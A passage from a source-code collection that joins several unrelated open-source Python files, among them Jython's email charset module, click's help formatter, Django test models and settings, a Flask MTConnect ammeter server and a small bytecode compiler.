output charset when the method Charset.convert() is called. The default
is to output in the same character set as the input.
Both input_charset and output_charset must have Unicode codec entries in
the module's charset-to-codec mapping; use add_codec(charset, codecname)
to add codecs the module does not know about. See the codecs module's
documentation for more information.
"""
if body_enc == SHORTEST:
raise ValueError('SHORTEST not allowed for body_enc')
CHARSETS[charset] = (header_enc, body_enc, output_charset)
def add_alias(alias, canonical):
"""Add a character set alias.
alias is the alias name, e.g. latin-1
canonical is the character set's canonical name, e.g. iso-8859-1
"""
ALIASES[alias] = canonical
def add_codec(charset, codecname):
"""Add a codec that map characters in the given charset to/from Unicode.
charset is the canonical name of a character set. codecname is the name
of a Python codec, as appropriate for the second argument to the unicode()
built-in, or to the encode() method of a Unicode string.
"""
CODEC_MAP[charset] = codecname
class Charset:
"""Map character sets to their email properties.
This class provides information about the requirements imposed on email
for a specific character set. It also provides convenience routines for
converting between character sets, given the availability of the
applicable codecs. Given a character set, it will do its best to provide
information on how to use that character set in an email in an
RFC-compliant way.
Certain character sets must be encoded with quoted-printable or base64
when used in email headers or bodies. Certain character sets must be
converted outright, and are not allowed in email. Instances of this
module expose the following information about a character set:
input_charset: The initial character set specified. Common aliases
are converted to their `official' email names (e.g. latin_1
is converted to iso-8859-1). Defaults to 7-bit us-ascii.
header_encoding: If the character set must be encoded before it can be
used in an email header, this attribute will be set to
Charset.QP (for quoted-printable), Charset.BASE64 (for
base64 encoding), or Charset.SHORTEST for the shortest of
QP or BASE64 encoding. Otherwise, it will be None.
body_encoding: Same as header_encoding, but describes the encoding for the
mail message's body, which indeed may be different than the
header encoding. Charset.SHORTEST is not allowed for
body_encoding.
output_charset: Some character sets must be converted before the can be
used in email headers or bodies. If the input_charset is
one of them, this attribute will contain the name of the
charset output will be converted to. Otherwise, it will
be None.
input_codec: The name of the Python codec used to convert the
input_charset to Unicode. If no conversion codec is
necessary, this attribute will be None.
output_codec: The name of the Python codec used to convert Unicode
to the output_charset. If no conversion codec is necessary,
this attribute will have the same value as the input_codec.
"""
def __init__(self, input_charset=DEFAULT_CHARSET):
# RFC 2046, $4.1.2 says charsets are not case sensitive. We coerce to
# unicode because its .lower() is locale insensitive. If the argument
# is already a unicode, we leave it at that, but ensure that the
# charset is ASCII, as the standard (RFC XXX) requires.
try:
if isinstance(input_charset, unicode):
input_charset.encode('ascii')
else:
input_charset = unicode(input_charset, 'ascii')
except UnicodeError:
raise errors.CharsetError(input_charset)
input_charset = input_charset.lower()
# Set the input charset after filtering through the aliases
self.input_charset = ALIASES.get(input_charset, input_charset)
# We can try to guess which encoding and conversion to use by the
# charset_map dictionary. Try that first, but let the user override
# it.
henc, benc, conv = CHARSETS.get(self.input_charset,
(SHORTEST, BASE64, None))
if not conv:
conv = self.input_charset
# Set the attributes, allowing the arguments to override the default.
self.header_encoding = henc
self.body_encoding = benc
self.output_charset = ALIASES.get(conv, conv)
# Now set the codecs. If one isn't defined for input_charset,
# guess and try a Unicode codec with the same name as input_codec.
self.input_codec = CODEC_MAP.get(self.input_charset,
self.input_charset)
self.output_codec = CODEC_MAP.get(self.output_charset,
self.output_charset)
def __str__(self):
return self.input_charset.lower()
__repr__ = __str__
def __eq__(self, other):
return str(self) == str(other).lower()
def __ne__(self, other):
return not self.__eq__(other)
def get_body_encoding(self):
"""Return the content-transfer-encoding used for body encoding.
This is either the string `quoted-printable' or `base64' depending on
the encoding used, or it is a function in which case you should call
the function with a single argument, the Message object being
encoded. The function should then set the Content-Transfer-Encoding
header itself to whatever is appropriate.
Returns "quoted-printable" if self.body_encoding is QP.
Returns "base64" if self.body_encoding is BASE64.
Returns "7bit" otherwise.
"""
assert self.body_encoding <> SHORTEST
if self.body_encoding == QP:
return 'quoted-printable'
elif self.body_encoding == BASE64:
return 'base64'
else:
return encode_7or8bit
def convert(self, s):
"""Convert a string from the input_codec to the output_codec."""
if self.input_codec <> self.output_codec:
return unicode(s, self.input_codec).encode(self.output_codec)
else:
return s
def to_splittable(self, s):
"""Convert a possibly multibyte string to a safely splittable format.
Uses the input_codec to try and convert the string to Unicode, so it
can be safely split on character boundaries (even for multibyte
characters).
Returns the string as-is if it isn't known how to convert it to
Unicode with the input_charset.
Characters that could not be converted to Unicode will be replaced
with the Unicode replacement character U+FFFD.
"""
if isinstance(s, unicode) or self.input_codec is None:
return s
try:
return unicode(s, self.input_codec, 'replace')
except LookupError:
# Input codec not installed on system, so return the original
# string unchanged.
return s
def from_splittable(self, ustr, to_output=True):
"""Convert a splittable string back into an encoded string.
Uses the proper codec to try and convert the string from Unicode back
into an encoded format. Return the string as-is if it is not Unicode,
or if it could not be converted from Unicode.
Characters that could not be converted from Unicode will be replaced
with an appropriate character (usually '?').
If to_output is True (the default), uses output_codec to convert to an
encoded format. If to_output is False, uses input_codec.
"""
if to_output:
codec = self.output_codec
else:
codec = self.input_codec
if not isinstance(ustr, unicode) or codec is None:
return ustr
try:
return ustr.encode(codec, 'replace')
except LookupError:
# Output codec not installed
return ustr
def get_output_charset(self):
"""Return the output character set.
This is self.output_charset if that is not None, otherwise it is
self.input_charset.
"""
return self.output_charset or self.input_charset
def encoded_header_len(self, s):
"""Return the length of the encoded header string."""
cset = self.get_output_charset()
# The len(s) of a 7bit encoding is len(s)
if self.header_encoding == BASE64:
return email.base64mime.base64_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == QP:
return email.quoprimime.header_quopri_len(s) + len(cset) + MISC_LEN
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
return min(lenb64, lenqp) + len(cset) + MISC_LEN
else:
return len(s)
def header_encode(self, s, convert=False):
"""Header-encode a string, optionally converting it to output_charset.
If convert is True, the string will be converted from the input
charset to the output charset automatically. This is not useful for
multibyte character sets, which have line length issues (multibyte
characters must be split on a character, not a byte boundary); use the
high-level Header class to deal with these issues. convert defaults
to False.
The type of encoding (base64 or quoted-printable) will be based on
self.header_encoding.
"""
cset = self.get_output_charset()
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (modulo conversions)
if self.header_encoding == BASE64:
return email.base64mime.header_encode(s, cset)
elif self.header_encoding == QP:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
elif self.header_encoding == SHORTEST:
lenb64 = email.base64mime.base64_len(s)
lenqp = email.quoprimime.header_quopri_len(s)
if lenb64 < lenqp:
return email.base64mime.header_encode(s, cset)
else:
return email.quoprimime.header_encode(s, cset, maxlinelen=None)
else:
return s
def body_encode(self, s, convert=True):
"""Body-encode a string and convert it to output_charset.
If convert is True (the default), the string will be converted from
the input charset to output charset automatically. Unlike
header_encode(), there are no issues with byte boundaries and
multibyte charsets in email bodies, so this is usually pretty safe.
The type of encoding (base64 or quoted-printable) will be based on
self.body_encoding.
"""
if convert:
s = self.convert(s)
# 7bit/8bit encodings return the string unchanged (module conversions)
if self.body_encoding is BASE64:
return email.base64mime.body_encode(s)
elif self.body_encoding is QP:
return email.quoprimime.body_encode(s)
else:
return s
| zephyrplugins/zephyr | zephyr.plugin.jython/jython2.5.2rc3/Lib/email/charset.py | Python | epl-1.0 | 15,684 |
# $Id: __init__.py 7646 2013-04-17 14:17:37Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
This package contains Docutils parser modules.
"""
__docformat__ = 'reStructuredText'
import sys
from docutils import Component
if sys.version_info < (2,5):
from docutils._compat import __import__
class Parser(Component):
component_type = 'parser'
config_section = 'parsers'
def parse(self, inputstring, document):
"""Override to parse `inputstring` into document tree `document`."""
raise NotImplementedError('subclass must override this method')
def setup_parse(self, inputstring, document):
"""Initial parse setup. Call at start of `self.parse()`."""
self.inputstring = inputstring
self.document = document
document.reporter.attach_observer(document.note_parse_message)
def finish_parse(self):
"""Finalize parse details. Call at end of `self.parse()`."""
self.document.reporter.detach_observer(
self.document.note_parse_message)
_parser_aliases = {
'restructuredtext': 'rst',
'rest': 'rst',
'restx': 'rst',
'rtxt': 'rst',}
def get_parser_class(parser_name):
"""Return the Parser class from the `parser_name` module."""
parser_name = parser_name.lower()
if parser_name in _parser_aliases:
parser_name = _parser_aliases[parser_name]
try:
module = __import__(parser_name, globals(), locals(), level=1)
except ImportError:
module = __import__(parser_name, globals(), locals(), level=0)
return module.Parser
| JulienMcJay/eclock | windows/Python27/Lib/site-packages/docutils/parsers/__init__.py | Python | gpl-2.0 | 1,657 |
"""
Generic relations
Generic relations let an object have a foreign key to any object through a
content-type/object-id field. A ``GenericForeignKey`` field can point to any
object, be it animal, vegetable, or mineral.
The canonical example is tags (although this example implementation is *far*
from complete).
"""
from __future__ import unicode_literals
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class TaggedItem(models.Model):
"""A tag on an item."""
tag = models.SlugField()
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey()
class Meta:
ordering = ["tag", "content_type__model"]
def __str__(self):
return self.tag
class ValuableTaggedItem(TaggedItem):
value = models.PositiveIntegerField()
class AbstractComparison(models.Model):
comparative = models.CharField(max_length=50)
content_type1 = models.ForeignKey(ContentType, models.CASCADE, related_name="comparative1_set")
object_id1 = models.PositiveIntegerField()
first_obj = GenericForeignKey(ct_field="content_type1", fk_field="object_id1")
@python_2_unicode_compatible
class Comparison(AbstractComparison):
"""
A model that tests having multiple GenericForeignKeys. One is defined
through an inherited abstract model and one defined directly on this class.
"""
content_type2 = models.ForeignKey(ContentType, models.CASCADE, related_name="comparative2_set")
object_id2 = models.PositiveIntegerField()
other_obj = GenericForeignKey(ct_field="content_type2", fk_field="object_id2")
def __str__(self):
return "%s is %s than %s" % (self.first_obj, self.comparative, self.other_obj)
@python_2_unicode_compatible
class Animal(models.Model):
common_name = models.CharField(max_length=150)
latin_name = models.CharField(max_length=150)
tags = GenericRelation(TaggedItem, related_query_name='animal')
comparisons = GenericRelation(Comparison,
object_id_field="object_id1",
content_type_field="content_type1")
def __str__(self):
return self.common_name
@python_2_unicode_compatible
class Vegetable(models.Model):
name = models.CharField(max_length=150)
is_yucky = models.BooleanField(default=True)
tags = GenericRelation(TaggedItem)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Mineral(models.Model):
name = models.CharField(max_length=150)
hardness = models.PositiveSmallIntegerField()
# note the lack of an explicit GenericRelation here...
def __str__(self):
return self.name
class GeckoManager(models.Manager):
def get_queryset(self):
return super(GeckoManager, self).get_queryset().filter(has_tail=True)
class Gecko(models.Model):
has_tail = models.BooleanField(default=False)
objects = GeckoManager()
# To test fix for #11263
class Rock(Mineral):
tags = GenericRelation(TaggedItem)
class ManualPK(models.Model):
id = models.IntegerField(primary_key=True)
tags = GenericRelation(TaggedItem, related_query_name='manualpk')
class ForProxyModelModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
obj = GenericForeignKey(for_concrete_model=False)
title = models.CharField(max_length=255, null=True)
class ForConcreteModelModel(models.Model):
content_type = models.ForeignKey(ContentType, models.CASCADE)
object_id = models.PositiveIntegerField()
obj = GenericForeignKey()
class ConcreteRelatedModel(models.Model):
bases = GenericRelation(ForProxyModelModel, for_concrete_model=False)
class ProxyRelatedModel(ConcreteRelatedModel):
class Meta:
proxy = True
# To test fix for #7551
class AllowsNullGFK(models.Model):
content_type = models.ForeignKey(ContentType, models.SET_NULL, null=True)
object_id = models.PositiveIntegerField(null=True)
content_object = GenericForeignKey()
| megaumi/django | tests/generic_relations/models.py | Python | bsd-3-clause | 4,327 |
from contextlib import contextmanager
from .termui import get_terminal_size
from .parser import split_opt
from ._compat import term_len
# Can force a width. This is used by the test system
FORCED_WIDTH = None
def measure_table(rows):
widths = {}
for row in rows:
for idx, col in enumerate(row):
widths[idx] = max(widths.get(idx, 0), term_len(col))
return tuple(y for x, y in sorted(widths.items()))
def iter_rows(rows, col_count):
for row in rows:
row = tuple(row)
yield row + ('',) * (col_count - len(row))
def wrap_text(text, width=78, initial_indent='', subsequent_indent='',
preserve_paragraphs=False):
"""A helper function that intelligently wraps text. By default, it
assumes that it operates on a single paragraph of text but if the
`preserve_paragraphs` parameter is provided it will intelligently
handle paragraphs (defined by two empty lines).
If paragraphs are handled, a paragraph can be prefixed with an empty
line containing the ``\\b`` character (``\\x08``) to indicate that
no rewrapping should happen in that block.
:param text: the text that should be rewrapped.
:param width: the maximum width for the text.
:param initial_indent: the initial indent that should be placed on the
first line as a string.
:param subsequent_indent: the indent string that should be placed on
each consecutive line.
:param preserve_paragraphs: if this flag is set then the wrapping will
intelligently handle paragraphs.
"""
from ._textwrap import TextWrapper
text = text.expandtabs()
wrapper = TextWrapper(width, initial_indent=initial_indent,
subsequent_indent=subsequent_indent,
replace_whitespace=False)
if not preserve_paragraphs:
return wrapper.fill(text)
p = []
buf = []
indent = None
def _flush_par():
if not buf:
return
if buf[0].strip() == '\b':
p.append((indent or 0, True, '\n'.join(buf[1:])))
else:
p.append((indent or 0, False, ' '.join(buf)))
del buf[:]
for line in text.splitlines():
if not line:
_flush_par()
indent = None
else:
if indent is None:
orig_len = term_len(line)
line = line.lstrip()
indent = orig_len - term_len(line)
buf.append(line)
_flush_par()
rv = []
for indent, raw, text in p:
with wrapper.extra_indent(' ' * indent):
if raw:
rv.append(wrapper.indent_only(text))
else:
rv.append(wrapper.fill(text))
return '\n\n'.join(rv)
class HelpFormatter(object):
"""This class helps with formatting text-based help pages. It's
usually just needed for very special internal cases, but it's also
exposed so that developers can write their own fancy outputs.
At present, it always writes into memory.
:param indent_increment: the additional increment for each level.
:param width: the width for the text. This defaults to the terminal
width clamped to a maximum of 78.
"""
def __init__(self, indent_increment=2, width=None, max_width=None):
self.indent_increment = indent_increment
if max_width is None:
max_width = 80
if width is None:
width = FORCED_WIDTH
if width is None:
width = max(min(get_terminal_size()[0], max_width) - 2, 50)
self.width = width
self.current_indent = 0
self.buffer = []
def write(self, string):
"""Writes a unicode string into the internal buffer."""
self.buffer.append(string)
def indent(self):
"""Increases the indentation."""
self.current_indent += self.indent_increment
def dedent(self):
"""Decreases the indentation."""
self.current_indent -= self.indent_increment
def write_usage(self, prog, args='', prefix='Usage: '):
"""Writes a usage line into the buffer.
:param prog: the program name.
:param args: whitespace separated list of arguments.
:param prefix: the prefix for the first line.
"""
usage_prefix = '%*s%s ' % (self.current_indent, prefix, prog)
text_width = self.width - self.current_indent
if text_width >= (term_len(usage_prefix) + 20):
# The arguments will fit to the right of the prefix.
indent = ' ' * term_len(usage_prefix)
self.write(wrap_text(args, text_width,
initial_indent=usage_prefix,
subsequent_indent=indent))
else:
# The prefix is too long, put the arguments on the next line.
self.write(usage_prefix)
self.write('\n')
indent = ' ' * (max(self.current_indent, term_len(prefix)) + 4)
self.write(wrap_text(args, text_width,
initial_indent=indent,
subsequent_indent=indent))
self.write('\n')
def write_heading(self, heading):
"""Writes a heading into the buffer."""
self.write('%*s%s:\n' % (self.current_indent, '', heading))
def write_paragraph(self):
"""Writes a paragraph into the buffer."""
if self.buffer:
self.write('\n')
def write_text(self, text):
"""Writes re-indented text into the buffer. This rewraps and
preserves paragraphs.
"""
text_width = max(self.width - self.current_indent, 11)
indent = ' ' * self.current_indent
self.write(wrap_text(text, text_width,
initial_indent=indent,
subsequent_indent=indent,
preserve_paragraphs=True))
self.write('\n')
def write_dl(self, rows, col_max=30, col_spacing=2):
"""Writes a definition list into the buffer. This is how options
and commands are usually formatted.
:param rows: a list of two item tuples for the terms and values.
:param col_max: the maximum width of the first column.
:param col_spacing: the number of spaces between the first and
second column.
"""
rows = list(rows)
widths = measure_table(rows)
if len(widths) != 2:
raise TypeError('Expected two columns for definition list')
first_col = min(widths[0], col_max) + col_spacing
for first, second in iter_rows(rows, len(widths)):
self.write('%*s%s' % (self.current_indent, '', first))
if not second:
self.write('\n')
continue
if term_len(first) <= first_col - col_spacing:
self.write(' ' * (first_col - term_len(first)))
else:
self.write('\n')
self.write(' ' * (first_col + self.current_indent))
text_width = max(self.width - first_col - 2, 10)
lines = iter(wrap_text(second, text_width).splitlines())
if lines:
self.write(next(lines) + '\n')
for line in lines:
self.write('%*s%s\n' % (
first_col + self.current_indent, '', line))
else:
self.write('\n')
@contextmanager
def section(self, name):
"""Helpful context manager that writes a paragraph, a heading,
and the indents.
:param name: the section name that is written as heading.
"""
self.write_paragraph()
self.write_heading(name)
self.indent()
try:
yield
finally:
self.dedent()
@contextmanager
def indentation(self):
"""A context manager that increases the indentation."""
self.indent()
try:
yield
finally:
self.dedent()
def getvalue(self):
"""Returns the buffer contents."""
return ''.join(self.buffer)
def join_options(options):
"""Given a list of option strings this joins them in the most appropriate
way and returns them in the form ``(formatted_string,
any_prefix_is_slash)`` where the second item in the tuple is a flag that
indicates if any of the option prefixes was a slash.
"""
rv = []
any_prefix_is_slash = False
for opt in options:
prefix = split_opt(opt)[0]
if prefix == '/':
any_prefix_is_slash = True
rv.append((len(prefix), opt))
rv.sort(key=lambda x: x[0])
rv = ', '.join(x[1] for x in rv)
return rv, any_prefix_is_slash
| wildchildyn/autism-website | yanni_env/lib/python3.6/site-packages/click/formatting.py | Python | gpl-3.0 | 8,889 |
#!/usr/bin/env python
#
# BBB-Network-Ammeter
#
# Copyright (c) 2016, Forest Crossman <[email protected]>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
from datetime import datetime
from lxml import etree
from flask import Flask, Response
from Adafruit_BBIO import ADC
app = Flask(__name__)
def get_current():
voltage = get_adc_voltage()
current = 109.2 * voltage + 5.3688
return current
def get_adc_voltage():
# Read a value from the ADC
value = ADC.read("P9_39") # AIN0
# Convert the number to a voltage
voltage = value * 1.8
return voltage
@app.route("/sample")
def sample():
voltage = get_adc_voltage()
return Response("{:.03f} V".format(voltage))
@app.route("/probe")
def probe():
'''Generate a response for probe requests'''
mtconnect_schema = "urn:mtconnect.org:MTConnectDevices:1.3"
schema_url = "http://www.mtconnect.org/schemas/MTConnectDevices_1.3.xsd"
xsi = "http://www.w3.org/2001/XMLSchema-instance"
MTConnectDevices = etree.Element("MTConnectDevices",
nsmap={
None: mtconnect_schema,
"xsi": xsi,
"m": mtconnect_schema,
}
)
MTConnectDevices.attrib["{{{pre}}}schemaLocation".format(pre=xsi)] = \
"{schema} {schema_url}".format(schema=mtconnect_schema, schema_url=schema_url)
creation_time = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
Header = etree.SubElement(MTConnectDevices, "Header",
creationTime=creation_time,
instanceId="0",
sender="mtcagent",
bufferSize="0",
version="0.1",
assetCount="1",
)
Devices = etree.SubElement(MTConnectDevices, "Devices")
Device = etree.SubElement(Devices, "Device",
id="dev",
iso841Class="6",
name="currentSensor",
sampleInterval="10",
uuid="0",
)
Description = etree.SubElement(Device, "Description",
manufacturer="RPI MILL",
)
DataItems_0 = etree.SubElement(Device, "DataItems")
DataItem_0 = etree.SubElement(DataItems_0, "DataItem",
category="EVENT",
id="avail",
type="MACHINE_ON",
)
Components_0 = etree.SubElement(Device, "Components")
Axes = etree.SubElement(Components_0, "Axes", id="ax", name="Axes")
Components_1 = etree.SubElement(Axes, "Components")
Linear = etree.SubElement(Components_1, "Linear", id="x1", name="X")
DataItems_1 = etree.SubElement(Linear, "DataItems")
DataItem_1 = etree.SubElement(DataItems_1, "DataItem",
category="SAMPLE",
id="current1",
name="current1",
nativeUnits="AMPERE",
subType="ACTUAL",
type="CURRENT",
units="AMPERE",
)
response = etree.tostring(MTConnectDevices,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8'
)
return Response(response, mimetype='text/xml')
@app.route("/current")
def current():
mtconnect_schema = "urn:mtconnect.org:MTConnectStreams:1.3"
schema_url = "http://www.mtconnect.org/schemas/MTConnectStreams_1.3.xsd"
xsi = "http://www.w3.org/2001/XMLSchema-instance"
MTConnectStreams = etree.Element("MTConnectStreams",
nsmap={
None: mtconnect_schema,
"xsi": xsi,
"m": mtconnect_schema,
}
)
MTConnectStreams.attrib["{{{pre}}}schemaLocation".format(pre=xsi)] = \
"{schema} {schema_url}".format(schema=mtconnect_schema, schema_url=schema_url)
creation_time = datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
Header = etree.SubElement(MTConnectStreams, "Header",
creationTime=creation_time,
instanceId="0",
sender="mtcagent",
bufferSize="0",
version="0.1",
assetCount="1",
)
Streams = etree.SubElement(MTConnectStreams, "Streams")
DeviceStream = etree.SubElement(Streams, "DeviceStream",
name="VMC-3Axis",
uuid="0",
)
ComponentStream = etree.SubElement(DeviceStream, "ComponentStream",
component="Rotary",
name="C",
componentId="c1",
)
Samples = etree.SubElement(ComponentStream, "Samples")
Current = etree.SubElement(Samples, "Current",
dataItemId="c2",
timestamp=datetime.utcnow().isoformat(),
name="Scurrent",
sequence="8403169415",
subType="ACTUAL",
)
Current.text = "{current:.03f}".format(current=get_current())
Events = etree.SubElement(ComponentStream, "Events")
MachineMode = etree.SubElement(Events, "MachineMode",
dataItemId="machineMode",
timestamp=datetime.utcnow().isoformat(),
name="Cmode",
sequence="18"
)
MachineMode.text = "ON"
response = etree.tostring(MTConnectStreams,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8'
)
return Response(response, mimetype='text/xml')
if __name__ == "__main__":
ADC.setup()
app.run(host='0.0.0.0', debug=False)
| cyrozap/BBB-Network-Ammeter | server.py | Python | isc | 5,648 |
# Django settings for test_project project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'test.db',
}
}
TIME_ZONE = 'Etc/UTC'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
STATIC_URL = '/static/'
SECRET_KEY = 't^4dt#fkxftpborp@%lg*#h2wj%vizl)#pkkt$&0f7b87rbu6y'
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'test_project.urls'
WSGI_APPLICATION = 'test_project.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django.contrib.admin',
'djcelery',
'django_nose',
'useful', # Import the app to run tests
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
TEMPLATE_CONTEXT_PROCESSORS = (
'useful.context_processors.settings',
)
BROKER_BACKEND = 'memory'
CELERY_ALWAYS_EAGER = True
from datetime import timedelta
CELERYBEAT_SCHEDULE = {
'cleanup': {
'task': 'useful.tasks.call_management_command',
'schedule': timedelta(seconds=10),
'args': ('validate', ),
},
}
| yprez/django-useful | test_project/test_project_py2/settings.py | Python | isc | 1,842 |
from flatten import *
POS_SIZE = 2**23 - 1
NEG_SIZE = -2**23
OPTIMIZE = True
OPTIMIZERS = {
'set': 'SET',
'setglobal': 'SET_GLOBAL',
'local': 'SET_LOCAL',
'get': 'GET',
'getglobal': 'GET_GLOBAL',
'return': 'RETURN',
'recurse': 'RECURSE',
'drop': 'DROP',
'dup': 'DUP',
'[]': 'NEW_LIST',
'{}': 'NEW_DICT',
'swap': 'SWAP',
'rot': 'ROT',
'over': 'OVER',
'pop-from': 'POP_FROM',
'push-to': 'PUSH_TO',
'push-through': 'PUSH_THROUGH',
'has': 'HAS_DICT',
'get-from': 'GET_DICT',
'set-to': 'SET_DICT',
'raise': 'RAISE',
'reraise': 'RERAISE',
'call': 'CALL',
}
ARGED_OPT = set('SET SET_LOCAL SET_GLOBAL GET GET_GLOBAL'.split())
positional_instructions = set('JMP JMPZ LABDA JMPEQ JMPNE ENTER_ERRHAND'.split())
def convert(filename, flat):
bytecode = [SingleInstruction('SOURCE_FILE', String(None, '"' + filename))]
for k in flat:
if isinstance(k, SingleInstruction):
bytecode.append(k)
elif isinstance(k, Code):
for w in k.words:
if isinstance(w, ProperWord):
if OPTIMIZE and w.value in OPTIMIZERS:
if OPTIMIZERS[w.value] in ARGED_OPT:
if bytecode and bytecode[-1].opcode == 'PUSH_LITERAL' and isinstance(bytecode[-1].ref, Ident):
s = bytecode.pop().ref
else:
bytecode.append(SingleInstruction('PUSH_WORD', w))
continue
else:
s = 0
bytecode.append(SingleInstruction(OPTIMIZERS[w.value], s))
elif w.value == 'for':
mstart = Marker()
mend = Marker()
bytecode.extend([
mstart,
SingleInstruction('DUP', 0),
SingleInstruction('JMPZ', mend),
SingleInstruction('CALL', 0),
SingleInstruction('JMP', mstart),
mend,
SingleInstruction('DROP', 0)
])
elif w.value == '(:split:)':
mparent = Marker()
mchild = Marker()
bytecode.extend([
SingleInstruction('LABDA', mparent),
SingleInstruction('JMP', mchild),
mparent,
SingleInstruction('RETURN', 0),
mchild,
])
elif w.value == '\xce\xbb': #U+03BB GREEK SMALL LETTER LAMDA
for i in range(len(bytecode) - 1, -1, -1):
l = bytecode[i]
if isinstance(l, SingleInstruction) and l.opcode == 'PUSH_WORD' and l.ref.value == ';':
l.opcode = 'LABDA'
l.ref = Marker()
bytecode.extend([
SingleInstruction('RETURN', 0),
l.ref,
])
break
else:
raise DejaSyntaxError('Inline lambda without closing semi-colon.')
elif '!' in w.value:
if w.value.startswith('!'):
w.value = 'eva' + w.value
if w.value.endswith('!'):
w.value = w.value[:-1]
args = w.value.split('!')
base = args.pop(0)
bytecode.extend(SingleInstruction('PUSH_LITERAL', x) for x in reversed(args))
bytecode.extend([
SingleInstruction('PUSH_WORD', base),
SingleInstruction('GET_DICT', 0),
SingleInstruction('CALL', 0)
])
else:
bytecode.append(SingleInstruction('PUSH_WORD', w))
elif isinstance(w, Number) and w.value.is_integer() and w.value <= POS_SIZE and w.value >= NEG_SIZE:
bytecode.append(SingleInstruction('PUSH_INTEGER', int(w.value)))
else:
bytecode.append(SingleInstruction('PUSH_LITERAL', w))
elif isinstance(k, Marker):
bytecode.append(k)
elif isinstance(k, GoTo):
bytecode.append(SingleInstruction('JMP', k.index))
elif isinstance(k, Branch):
bytecode.append(SingleInstruction('JMPZ', k.index))
elif isinstance(k, LabdaNode):
bytecode.append(SingleInstruction('LABDA', k.index))
bytecode.append(SingleInstruction('RETURN', 0))
return bytecode
def is_return(node):
return isinstance(node, SingleInstruction) and node.opcode == 'RETURN'
def is_jump_to(node, marker):
return isinstance(node, SingleInstruction) and node.opcode == 'JMP' and node.ref is marker
def is_pass(node):
return isinstance(node, SingleInstruction) and node.opcode == 'PUSH_WORD' and (node.ref == 'pass' or (isinstance(node.ref, ProperWord) and node.ref.value == 'pass'))
def is_linenr(node):
return isinstance(node, SingleInstruction) and node.opcode == 'LINE_NUMBER'
def get(l, i):
try:
return l[i]
except IndexError:
return None
def optimize(flattened): #optimize away superfluous RETURN statements
for i, instruction in reversed(list(enumerate(flattened))):
if (is_return(instruction) and (is_return(get(flattened, i + 1)) or (isinstance(get(flattened, i + 1), Marker) and is_return(get(flattened, i + 2))))
or isinstance(get(flattened, i + 1), Marker) and is_jump_to(instruction, get(flattened, i + 1))
or isinstance(get(flattened, i + 2), Marker) and isinstance(get(flattened, i + 1), Marker) and is_jump_to(instruction, get(flattened, i + 2))
or is_pass(instruction)
or is_linenr(instruction) and is_linenr(get(flattened, i + 1))
):
flattened.pop(i)
return flattened
def refine(flattened): #removes all markers and replaces them by indices
#first pass: fill dictionary
memo = {}
i = 0
while i < len(flattened):
item = flattened[i]
if isinstance(item, Marker):
memo[item] = i
del flattened[i]
else:
i += 1
#second pass: change all goto and branches
for i, item in enumerate(flattened):
if item.opcode in positional_instructions:
item.ref = memo[item.ref] - i
return flattened
| gvx/deja | convert.py | Python | isc | 5,277 |
# Generated by Django 2.2.10 on 2020-04-29 12:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0020_auto_20200421_0851'),
]
operations = [
migrations.AddField(
model_name='localconfig',
name='need_dovecot_update',
field=models.BooleanField(default=False),
),
]
| modoboa/modoboa | modoboa/core/migrations/0021_localconfig_need_dovecot_update.py | Python | isc | 403 |
from . import meta_selector # noqa
from .pg import PatternGenerator
from .selector import Selector
PatternGenerator('')
Selector('')
| stack-of-tasks/sot-pattern-generator | src/dynamic_graph/sot/pattern_generator/__init__.py | Python | isc | 136 |
# -*- coding: utf8 -*-
import subprocess
import os
from pathlib import Path
cwd = os.getcwd()
try:
print(os.getcwd())
subprocess.call(['make'])
# res = subprocess.check_output('uname -a',shell=True)
res = subprocess.check_output(
